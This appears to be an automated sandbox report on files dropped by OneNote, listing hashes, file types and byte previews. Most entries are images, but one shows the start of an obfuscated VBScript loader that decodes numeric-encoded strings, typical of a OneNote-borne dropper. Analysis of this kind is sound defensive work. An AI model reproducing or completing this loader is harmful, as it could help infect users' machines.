Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	HTML document, ASCII text, with very long lines (792), with CRLF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.216959514455489
Encrypted:	false
SSDEEP:	768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
MD5:	AE25F2104967B2708AC9DBA80AAC52FD
SHA1:	7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
SHA-256:	11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
SHA-512:	D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
Malicious:	false
Preview:	<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	567
Entropy (8bit):	7.499095532051442
Encrypted:	false
SSDEEP:	12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
MD5:	D055CE625528E448C61315EAAEF5BB71
SHA1:	029DF4C872B1C154F32E7FE94F434547C3BA6192
SHA-256:	85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
SHA-512:	705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{\|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...\|...a<!..d....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
Category:	dropped
Size (bytes):	49224
Entropy (8bit):	7.402134460714453
Encrypted:	false
SSDEEP:	1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
MD5:	B7FC313714EDD7866F4C76527282C2B5
SHA1:	C86217B46956933FAE4A30483A63B33F34B8C503
SHA-256:	B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
SHA-512:	038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
Malicious:	false
Preview:	......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
